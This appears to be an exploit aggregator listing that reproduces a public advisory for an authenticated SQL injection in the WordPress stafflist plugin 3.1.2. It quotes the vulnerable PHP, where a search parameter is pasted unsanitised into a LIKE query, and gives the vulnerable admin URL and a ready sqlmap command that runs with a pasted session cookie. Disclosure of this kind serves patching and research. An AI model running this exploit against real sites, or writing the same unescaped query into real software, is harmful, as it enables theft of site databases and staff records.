Exploit for WordPress Stafflist 3.1.2 SQL Injection

Name: Exploit for WordPress Stafflist 3.1.2 SQL Injection
Rating: 5 (147 reviews)

2022-05-02 | CVSS 0.6

## https://sploitus.com/exploit?id=PACKETSTORM:166918
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection  
(Authenticated)  
# Date: 05-02-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/stafflist/  
# Version: 3.1.2  
# Tested on: Firefox  
# Contact me: h [at] spidersilk.com  
  
# Vulnerable Code:  
  
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?  
...  
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR  
LOWER(firstname) LIKE '%{$w}%' OR  
LOWER(department) LIKE '%{$w}%' OR  
LOWER(email) LIKE '%{$w}%'" : "");  
  
  
# Vulnerable URL  
  
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]  
  
# POC  
  
```  
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'  
--cookie="wordpress_cookies_paste_here"  
```  
  
# POC Image  
  
https://prnt.sc/AECcFRHhe2ib